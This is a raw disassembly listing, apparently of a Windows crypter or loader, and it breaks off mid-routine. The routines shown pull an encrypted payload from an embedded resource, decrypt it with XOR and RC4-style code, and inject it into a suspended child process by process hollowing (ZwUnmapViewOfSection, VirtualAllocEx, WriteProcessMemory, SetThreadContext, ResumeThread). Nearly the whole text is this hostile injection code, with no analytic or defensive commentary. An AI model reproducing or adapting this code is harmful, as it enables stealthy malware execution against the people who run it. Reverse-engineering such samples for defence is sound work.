call sub_4020B4
lea eax, [ebp+var_4]
mov ecx, esi
mov edx, 1
call sub_4020F4
loc_4032C7: ; CODE XREF: sub_403168+89�j
mov edx, [ebp+var_10]
mov eax, offset dword_403364
call sub_40213C
test eax, eax
jg loc_4031F6
mov eax, [ebp+var_8]
call sub_401DC4
mov ebx, edi
dec ebx
test ebx, ebx
jl short loc_403303
inc ebx
xor esi, esi
loc_4032EE: ; CODE XREF: sub_403168+199�j
mov eax, [ebp+var_8]
mov edx, [ebp+var_C]
mov edx, [edx+esi*4]
call sub_401F0C
mov eax, [ebp+var_8]
inc esi
dec ebx
jnz short loc_4032EE
loc_403303: ; CODE XREF: sub_403168+181�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40333B
loc_403310: ; CODE XREF: sub_403168+1D1�j
lea eax, [ebp+var_18]
mov edx, 3
call sub_401DE8
lea eax, [ebp+var_C]
mov edx, off_403140
call sub_4027F4
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403334: ; DATA XREF: sub_403168+1F�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403310
; ---------------------------------------------------------------------------
loc_40333B: ; CODE XREF: sub_403168+1CB�j
; DATA XREF: sub_403168+1A3�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403168 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_40334C dd 1, 0FFFFFFFFh, 1 ; sub_403168+54�o
dword_403358 dd 3Ah, 0FFFFFFFFh, 1 ; sub_403168+BC�o
dword_403364 dd 3Bh ; sub_403168+103�o ...
; =============== S U B R O U T I N E =======================================
sub_403368 proc near ; CODE XREF: CODE:00404000�p
; CODE:00404059�p ...
push ebx
push esi
mov esi, eax
push 0Ah
push edx
mov eax, ds:dword_4064AC
push eax
call sub_402AE4 ; FindResourceA
mov ebx, eax
push ebx
mov eax, ds:dword_4064AC
push eax
call sub_402B64 ; SizeofResource
mov [esi], eax
push ebx
mov eax, ds:dword_4064AC
push eax
call sub_402B24 ; LoadResource
mov ebx, eax
push ebx
call sub_402B2C ; SetHandleCount
mov esi, eax
test esi, esi
jz short loc_4033AA
push ebx
call sub_402AEC ; FreeResource
loc_4033AA: ; CODE XREF: sub_403368+3A�j
mov eax, esi
pop esi
pop ebx
retn
sub_403368 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033B0 proc near ; CODE XREF: CODE:004041F7�p
; CODE:0040442A�p ...
var_109 = byte ptr -109h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEF4h
push ebx
push esi
mov esi, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403438
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, esi
call sub_401DC4
lea eax, [ebp+var_109]
xor ecx, ecx
mov edx, 104h
call sub_4018A8
mov ebx, 104h
push ebx
lea eax, [ebp+var_109]
push eax
mov eax, [ebp+var_4]
call sub_402058
push eax
call sub_402AF4 ; GetEnvironmentVariableA
mov ebx, eax
test ebx, ebx
jbe short loc_403422
mov eax, esi
lea edx, [ebp+var_109]
mov ecx, 105h
call sub_401EEC
loc_403422: ; CODE XREF: sub_4033B0+5E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40343F
loc_40342F: ; CODE XREF: sub_4033B0+8D�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403438: ; DATA XREF: sub_4033B0+1B�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_40342F
; ---------------------------------------------------------------------------
loc_40343F: ; CODE XREF: sub_4033B0+87�j
; DATA XREF: sub_4033B0+7A�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4033B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403448 proc near ; DATA XREF: CODE:00403F98�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40346D
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064C4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403474
loc_40346C: ; CODE XREF: sub_403448+2A�j
retn
; ---------------------------------------------------------------------------
loc_40346D: ; DATA XREF: sub_403448+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_40346C
; ---------------------------------------------------------------------------
loc_403474: ; CODE XREF: sub_403448:loc_40346C�j
; DATA XREF: sub_403448+1F�o
pop ebp
retn
sub_403448 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403478 proc near ; DATA XREF: CODE:00403F94�o
sub ds:dword_4064C4, 1
retn
sub_403478 endp
; =============== S U B R O U T I N E =======================================
sub_403480 proc near ; CODE XREF: sub_403640+16E�p
lea edx, [eax+18h]
movzx eax, word ptr [eax+14h]
add edx, eax
mov eax, edx
retn
sub_403480 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40348C proc near ; CODE XREF: sub_403640+135�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp ds:dword_4064CC, 0
jnz short loc_4034B5
push offset aVirtualallocex ; "VirtualAllocEx"
push offset aKernel32_dll ; "kernel32.dll"
call sub_402B0C ; GetModuleHandleA
push eax
call sub_402B14 ; GetProcAddress
mov ds:dword_4064CC, eax
loc_4034B5: ; CODE XREF: sub_40348C+D�j
cmp ds:dword_4064CC, 0
jnz short loc_4034C7
push 78h
call sub_402B54 ; RtlSetLastWin32Error
jmp short loc_4034E3
; ---------------------------------------------------------------------------
loc_4034C7: ; CODE XREF: sub_40348C+30�j
mov eax, [ebp+arg_10]
push eax
mov eax, [ebp+arg_C]
push eax
mov eax, [ebp+arg_8]
push eax
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
push eax
call ds:dword_4064CC ; VirtualAllocEx
mov ebx, eax
loc_4034E3: ; CODE XREF: sub_40348C+39�j
mov eax, ebx
pop ebx
pop ebp
retn 14h
sub_40348C endp
; ---------------------------------------------------------------------------
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_40348C+F�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_40348C+14�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40350C proc near ; CODE XREF: sub_403640+1CF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp ds:dword_4064D0, 0
jnz short loc_403535
push offset aVirtualprotect ; "VirtualProtectEx"
push offset aKernel32_dll_0 ; "kernel32.dll"
call sub_402B0C ; GetModuleHandleA
push eax
call sub_402B14 ; GetProcAddress
mov ds:dword_4064D0, eax
loc_403535: ; CODE XREF: sub_40350C+D�j
cmp ds:dword_4064D0, 0
jnz short loc_403547
push 78h
call sub_402B54 ; RtlSetLastWin32Error
jmp short loc_403563
; ---------------------------------------------------------------------------
loc_403547: ; CODE XREF: sub_40350C+30�j
mov eax, [ebp+arg_10]
push eax
mov eax, [ebp+arg_C]
push eax
mov eax, [ebp+arg_8]
push eax
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
push eax
call ds:dword_4064D0 ; VirtualProtectEx
mov ebx, eax
loc_403563: ; CODE XREF: sub_40350C+39�j
mov eax, ebx
pop ebx
pop ebp
retn 14h
sub_40350C endp
; ---------------------------------------------------------------------------
align 4
aVirtualprotect db 'VirtualProtectEx',0 ; DATA XREF: sub_40350C+F�o
align 10h
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_40350C+14�o
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403590 proc near ; CODE XREF: sub_403640+F9�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp ds:dword_4064D4, 0
jnz short loc_4035B6
push offset aZwunmapviewofs ; "ZwUnmapViewOfSection"
push offset aNtdll_dll ; "ntdll.dll"
call sub_402B0C ; GetModuleHandleA
push eax
call sub_402B14 ; GetProcAddress
mov ds:dword_4064D4, eax
loc_4035B6: ; CODE XREF: sub_403590+A�j
cmp ds:dword_4064D4, 0
jnz short loc_4035C6
mov eax, 0C0000002h
jmp short loc_4035D4
; ---------------------------------------------------------------------------
loc_4035C6: ; CODE XREF: sub_403590+2D�j
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
push eax
call ds:dword_4064D4 ; ZwUnmapViewOfSection
loc_4035D4: ; CODE XREF: sub_403590+34�j
pop ebp
retn 8
sub_403590 endp
; ---------------------------------------------------------------------------
aZwunmapviewofs db 'ZwUnmapViewOfSection',0 ; DATA XREF: sub_403590+C�o
align 10h
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_403590+11�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035FC proc near ; DATA XREF: CODE:00403FA0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403621
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064C8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403628
loc_403620: ; CODE XREF: sub_4035FC+2A�j
retn
; ---------------------------------------------------------------------------
loc_403621: ; DATA XREF: sub_4035FC+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403620
; ---------------------------------------------------------------------------
loc_403628: ; CODE XREF: sub_4035FC:loc_403620�j
; DATA XREF: sub_4035FC+1F�o
pop ebp
retn
sub_4035FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40362C proc near ; DATA XREF: CODE:00403F9C�o
sub ds:dword_4064C8, 1
retn
sub_40362C endp
; =============== S U B R O U T I N E =======================================
sub_403634 proc near ; CODE XREF: sub_403640+1B8�p
shr eax, 1Dh
mov eax, ds:dword_4050A4[eax*4]
retn
sub_403634 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403640 proc near ; CODE XREF: CODE:0040439F�p
; CODE:004043E2�p
var_148 = dword ptr -148h
var_A4 = dword ptr -0A4h
var_98 = dword ptr -98h
var_7C = dword ptr -7Ch
var_4C = word ptr -4Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFEB8h
push ebx
push esi
push edi
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
call sub_402048
mov eax, [ebp+var_C]
call sub_402048
xor eax, eax
push ebp
push offset loc_4038B3
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_D], 0
lea eax, [ebp+var_38]
xor ecx, ecx
mov edx, 10h
call sub_4018A8
lea eax, [ebp+var_7C]
xor ecx, ecx
mov edx, 44h
call sub_4018A8
mov [ebp+var_7C], 44h
xor eax, eax
mov al, [ebp+arg_0]
mov [ebp+var_4C], ax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_7C]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
mov eax, [ebp+var_C]
call sub_402058
push eax
mov eax, [ebp+var_8]
call sub_402058
push eax
call sub_402ACC ; CreateProcessA
test eax, eax
jz loc_403898
mov [ebp+var_E], 0
xor eax, eax
push ebp
push offset loc_403891
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_148], 10002h
lea eax, [ebp+var_148]
push eax
mov eax, [ebp+var_34]
push eax
call sub_402B1C ; GetThreadContext
test eax, eax
jz loc_403863
lea eax, [ebp+var_18]
push eax
push 4
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_A4]
add eax, 8
push eax
mov eax, [ebp+var_38]
push eax
call sub_402B3C ; ReadProcessMemory
test eax, eax
jz loc_403863
mov eax, [ebp+var_14]
push eax
mov eax, [ebp+var_38]
push eax
call sub_403590
test eax, eax
jl loc_403863
cmp [ebp+var_4], 0
jz loc_403863
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
add eax, [ebp+var_4]
mov [ebp+var_1C], eax
push 4
push 3000h
mov eax, [ebp+var_1C]
mov eax, [eax+50h]
push eax
mov eax, [ebp+var_1C]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_38]
push eax
call sub_40348C
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_403863
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_1C]
mov eax, [eax+54h]
push eax
mov eax, [ebp+var_4]
push eax
mov eax, [ebp+var_14]
push eax
mov eax, [ebp+var_38]
push eax
call sub_402B7C ; WriteProcessMemory
test eax, eax
jz loc_403863
mov eax, [ebp+var_1C]
call sub_403480
mov esi, eax
mov eax, [ebp+var_1C]
movzx eax, word ptr [eax+6]
dec eax
test eax, eax
jb short loc_40381A
inc eax
mov [ebp+var_28], eax
xor ebx, ebx
loc_4037C7: ; CODE XREF: sub_403640+1D8�j
lea eax, [ebp+var_20]
push eax
lea edi, [ebx+ebx*4]
mov eax, [esi+edi*8+10h]
push eax
mov eax, [esi+edi*8+14h]
add eax, [ebp+var_4]
push eax
mov eax, [esi+edi*8+0Ch]
add eax, [ebp+var_14]
push eax
mov eax, [ebp+var_38]
push eax
call sub_402B7C ; WriteProcessMemory
test eax, eax
jz short loc_403814
lea eax, [ebp+var_24]
push eax
mov eax, [esi+edi*8+24h]
call sub_403634
push eax
mov eax, [esi+edi*8+8]
push eax
mov eax, [esi+edi*8+0Ch]
add eax, [ebp+var_14]
push eax
mov eax, [ebp+var_38]
push eax
call sub_40350C
loc_403814: ; CODE XREF: sub_403640+1AE�j
inc ebx
dec [ebp+var_28]
jnz short loc_4037C7
loc_40381A: ; CODE XREF: sub_403640+17F�j
lea eax, [ebp+var_20]
push eax
push 4
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_A4]
add eax, 8
push eax
mov eax, [ebp+var_38]
push eax
call sub_402B7C ; WriteProcessMemory
test eax, eax
jz short loc_403863
mov eax, [ebp+var_1C]
mov eax, [eax+28h]
add eax, [ebp+var_14]
mov [ebp+var_98], eax
lea eax, [ebp+var_148]
push eax
mov eax, [ebp+var_34]
push eax
call sub_402B5C ; SetThreadContext
cmp eax, 1
sbb eax, eax
inc eax
mov [ebp+var_E], al
loc_403863: ; CODE XREF: sub_403640+C6�j
; sub_403640+EB�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403898
loc_403870: ; CODE XREF: sub_403640+256�j
cmp [ebp+var_E], 0
jnz short loc_403883
push 0
mov eax, [ebp+var_38]
push eax
call sub_402B74 ; TerminateProcess
jmp short locret_403890
; ---------------------------------------------------------------------------
loc_403883: ; CODE XREF: sub_403640+234�j
mov eax, [ebp+var_34]
push eax
call sub_402B44 ; ResumeThread
mov [ebp+var_D], 1
locret_403890: ; CODE XREF: sub_403640+241�j
retn
; ---------------------------------------------------------------------------
loc_403891: ; DATA XREF: sub_403640+9F�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403870
; ---------------------------------------------------------------------------
loc_403898: ; CODE XREF: sub_403640+92�j
; DATA XREF: sub_403640+22B�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4038BA
loc_4038A5: ; CODE XREF: sub_403640+278�j
lea eax, [ebp+var_C]
mov edx, 2
call sub_401DE8
retn
; ---------------------------------------------------------------------------
loc_4038B3: ; DATA XREF: sub_403640+28�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_4038A5
; ---------------------------------------------------------------------------
loc_4038BA: ; CODE XREF: sub_403640+272�j
; DATA XREF: sub_403640+260�o
mov al, [ebp+var_D]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_403640 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038C8 proc near ; DATA XREF: CODE:00403FA8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_4038ED
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064D8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4038F4
loc_4038EC: ; CODE XREF: sub_4038C8+2A�j
retn
; ---------------------------------------------------------------------------
loc_4038ED: ; DATA XREF: sub_4038C8+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_4038EC
; ---------------------------------------------------------------------------
loc_4038F4: ; CODE XREF: sub_4038C8:loc_4038EC�j
; DATA XREF: sub_4038C8+1F�o
pop ebp
retn
sub_4038C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4038F8 proc near ; DATA XREF: CODE:00403FA4�o
sub ds:dword_4064D8, 1
retn
sub_4038F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403900 proc near ; CODE XREF: sub_4039AC+C4�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403999
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_10], 0
mov [ebp+var_C], 0
mov eax, [ebp+var_4]
call sub_401F04
mov ecx, eax
test ecx, ecx
jle short loc_403970
mov ebx, 1
loc_403941: ; CODE XREF: sub_403900+57�j
mov eax, [ebp+var_4]
mov al, [eax+ebx-1]
and eax, 0FFh
xor edx, edx
add [ebp+var_10], eax
adc [ebp+var_C], edx
inc ebx
dec ecx
jnz short loc_403941
jmp short loc_403970
; ---------------------------------------------------------------------------
loc_40395B: ; CODE XREF: sub_403900+7D�j
; sub_403900:loc_403981�j
push 0
push 2
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
call sub_4025C0
mov [ebp+var_10], eax
mov [ebp+var_C], edx
loc_403970: ; CODE XREF: sub_403900+3A�j
; sub_403900+59�j
cmp [ebp+var_C], 0
jnz short loc_403981
cmp [ebp+var_10], 0FFh
ja short loc_40395B
jmp short loc_403983
; ---------------------------------------------------------------------------
loc_403981: ; CODE XREF: sub_403900+74�j
jg short loc_40395B
loc_403983: ; CODE XREF: sub_403900+7F�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4039A0
loc_403990: ; CODE XREF: sub_403900+9E�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403999: ; DATA XREF: sub_403900+15�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403990
; ---------------------------------------------------------------------------
loc_4039A0: ; CODE XREF: sub_403900+98�j
; DATA XREF: sub_403900+8B�o
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
pop ebx
mov esp, ebp
pop ebp
retn
sub_403900 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039AC proc near ; CODE XREF: sub_403B84+50�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
mov [ebp+var_4], edx
mov ebx, eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403AA8
push dword ptr fs:[eax]
mov fs:[eax], esp
mov dword ptr [ebx], 0
mov dword ptr [ebx+4], 0
mov dword ptr [ebx+8], 0
mov dword ptr [ebx+0Ch], 0
mov dword ptr [ebx+10h], 0
mov dword ptr [ebx+14h], 0
cmp [ebp+arg_C], 0
jnz short loc_403A03
cmp [ebp+arg_8], 1
jnb short loc_403A13
jmp short loc_403A05
; ---------------------------------------------------------------------------
loc_403A03: ; CODE XREF: sub_4039AC+4D�j
jge short loc_403A13
loc_403A05: ; CODE XREF: sub_4039AC+55�j
mov [ebp+arg_8], 1
mov [ebp+arg_C], 0
loc_403A13: ; CODE XREF: sub_4039AC+53�j
; sub_4039AC:loc_403A03�j
cmp [ebp+arg_C], 0
jnz short loc_403A21
cmp [ebp+arg_8], 64h
jbe short loc_403A31
jmp short loc_403A23
; ---------------------------------------------------------------------------
loc_403A21: ; CODE XREF: sub_4039AC+6B�j
jle short loc_403A31
loc_403A23: ; CODE XREF: sub_4039AC+73�j
mov [ebp+arg_8], 63h
mov [ebp+arg_C], 0
loc_403A31: ; CODE XREF: sub_4039AC+71�j
; sub_4039AC:loc_403A21�j
cmp [ebp+arg_4], 0
jnz short loc_403A3F
cmp [ebp+arg_0], 1
jnb short loc_403A4F
jmp short loc_403A41
; ---------------------------------------------------------------------------
loc_403A3F: ; CODE XREF: sub_4039AC+89�j
jge short loc_403A4F
loc_403A41: ; CODE XREF: sub_4039AC+91�j
mov [ebp+arg_0], 2
mov [ebp+arg_4], 0
loc_403A4F: ; CODE XREF: sub_4039AC+8F�j
; sub_4039AC:loc_403A3F�j
cmp [ebp+arg_4], 0
jnz short loc_403A5D
cmp [ebp+arg_0], 64h
jbe short loc_403A6D
jmp short loc_403A5F
; ---------------------------------------------------------------------------
loc_403A5D: ; CODE XREF: sub_4039AC+A7�j
jle short loc_403A6D
loc_403A5F: ; CODE XREF: sub_4039AC+AF�j
mov [ebp+arg_0], 64h
mov [ebp+arg_4], 0
loc_403A6D: ; CODE XREF: sub_4039AC+AD�j
; sub_4039AC:loc_403A5D�j
mov eax, [ebp+var_4]
call sub_403900
mov [ebx], eax
mov [ebx+4], edx
mov eax, [ebp+arg_8]
mov [ebx+8], eax
mov eax, [ebp+arg_C]
mov [ebx+0Ch], eax
mov eax, [ebp+arg_0]
mov [ebx+10h], eax
mov eax, [ebp+arg_4]
mov [ebx+14h], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403AAF
loc_403A9F: ; CODE XREF: sub_4039AC+101�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403AA8: ; DATA XREF: sub_4039AC+15�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403A9F
; ---------------------------------------------------------------------------
loc_403AAF: ; CODE XREF: sub_4039AC+FB�j
; DATA XREF: sub_4039AC+EE�o
pop ebx
pop ecx
pop ebp
retn 10h
sub_4039AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AB8 proc near ; CODE XREF: sub_403B84+5D�p
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov esi, eax
lea edi, [ebp+var_20]
push ecx
mov ecx, 6
rep movsd
pop ecx
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403B75
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_401F04
mov edx, eax
mov eax, [ebp+var_8]
call sub_402184
mov ebx, [ebp+var_18]
mov eax, [ebp+var_4]
call sub_401F04
mov edi, eax
test edi, edi
jle short loc_403B5F
mov esi, 1
loc_403B13: ; CODE XREF: sub_403AB8+A5�j
mov eax, ebx
cdq
cmp edx, [ebp+var_C]
jnz short loc_403B22
cmp eax, [ebp+var_10]
jbe short loc_403B27
jmp short loc_403B24
; ---------------------------------------------------------------------------
loc_403B22: ; CODE XREF: sub_403AB8+61�j
jle short loc_403B27
loc_403B24: ; CODE XREF: sub_403AB8+68�j
mov ebx, [ebp+var_18]
loc_403B27: ; CODE XREF: sub_403AB8+66�j
; sub_403AB8:loc_403B22�j
mov eax, [ebp+var_8]
call sub_4020AC
lea eax, [eax+esi-1]
push eax
mov eax, [ebp+var_4]
mov al, [eax+esi-1]
and eax, 0FFh
xor edx, edx
push edx
push eax
mov eax, ebx
cdq
add eax, [ebp+var_20]
adc edx, [ebp+var_1C]
xor eax, [esp+44h+var_44]
xor edx, [esp+44h+var_40]
add esp, 8
pop edx
mov [edx], al
inc ebx
inc esi
dec edi
jnz short loc_403B13
loc_403B5F: ; CODE XREF: sub_403AB8+54�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403B7C
loc_403B6C: ; CODE XREF: sub_403AB8+C2�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403B75: ; DATA XREF: sub_403AB8+28�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403B6C
; ---------------------------------------------------------------------------
loc_403B7C: ; CODE XREF: sub_403AB8+BC�j
; DATA XREF: sub_403AB8+AF�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403AB8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B84 proc near ; CODE XREF: CODE:004041AF�p
; CODE:0040463B�p ...
var_20 = byte ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
mov ebx, ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
mov eax, [ebp+var_8]
call sub_402048
xor eax, eax
push ebp
push offset loc_403C01
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_401F04
mov edx, eax
mov eax, ebx
call sub_402184
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_20]
mov edx, [ebp+var_8]
call sub_4039AC
mov ecx, ebx
mov edx, [ebp+var_4]
lea eax, [ebp+var_20]
call sub_403AB8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403C08
loc_403BF3: ; CODE XREF: sub_403B84+82�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_401DE8
retn
; ---------------------------------------------------------------------------
loc_403C01: ; DATA XREF: sub_403B84+22�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403BF3
; ---------------------------------------------------------------------------
loc_403C08: ; CODE XREF: sub_403B84+7C�j
; DATA XREF: sub_403B84+6A�o
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_403B84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403C10 proc near ; DATA XREF: CODE:00403FB0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403C35
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064DC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403C3C
loc_403C34: ; CODE XREF: sub_403C10+2A�j
retn
; ---------------------------------------------------------------------------
loc_403C35: ; DATA XREF: sub_403C10+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403C34
; ---------------------------------------------------------------------------
loc_403C3C: ; CODE XREF: sub_403C10:loc_403C34�j
; DATA XREF: sub_403C10+1F�o
pop ebp
retn
sub_403C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403C40 proc near ; DATA XREF: CODE:00403FAC�o
sub ds:dword_4064DC, 1
retn
sub_403C40 endp
; =============== S U B R O U T I N E =======================================
sub_403C48 proc near ; CODE XREF: sub_403D98+15�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov [esp+1Ch+var_1C], edx
mov edi, eax
mov eax, [esp+1Ch+var_1C]
call sub_401F04
mov [esp+1Ch+var_14], eax
mov byte ptr [edi+100h], 0
mov byte ptr [edi+101h], 0
xor edx, edx
mov eax, edi
loc_403C72: ; CODE XREF: sub_403C48+30�j
mov [eax], dl
inc edx
inc eax
test dl, dl
jnz short loc_403C72
xor eax, eax
xor esi, esi
mov dl, 0
mov ecx, edi
loc_403C82: ; CODE XREF: sub_403C48+82�j
cmp esi, [esp+1Ch+var_14]
jge short loc_403C94
mov ebx, [esp+1Ch+var_1C]
mov bl, [ebx+esi]
mov [esp+1Ch+var_17], bl
jmp short loc_403C99
; ---------------------------------------------------------------------------
loc_403C94: ; CODE XREF: sub_403C48+3E�j
mov [esp+1Ch+var_17], 0
loc_403C99: ; CODE XREF: sub_403C48+4A�j
inc esi
cmp esi, [esp+1Ch+var_14]
jl short loc_403CA2
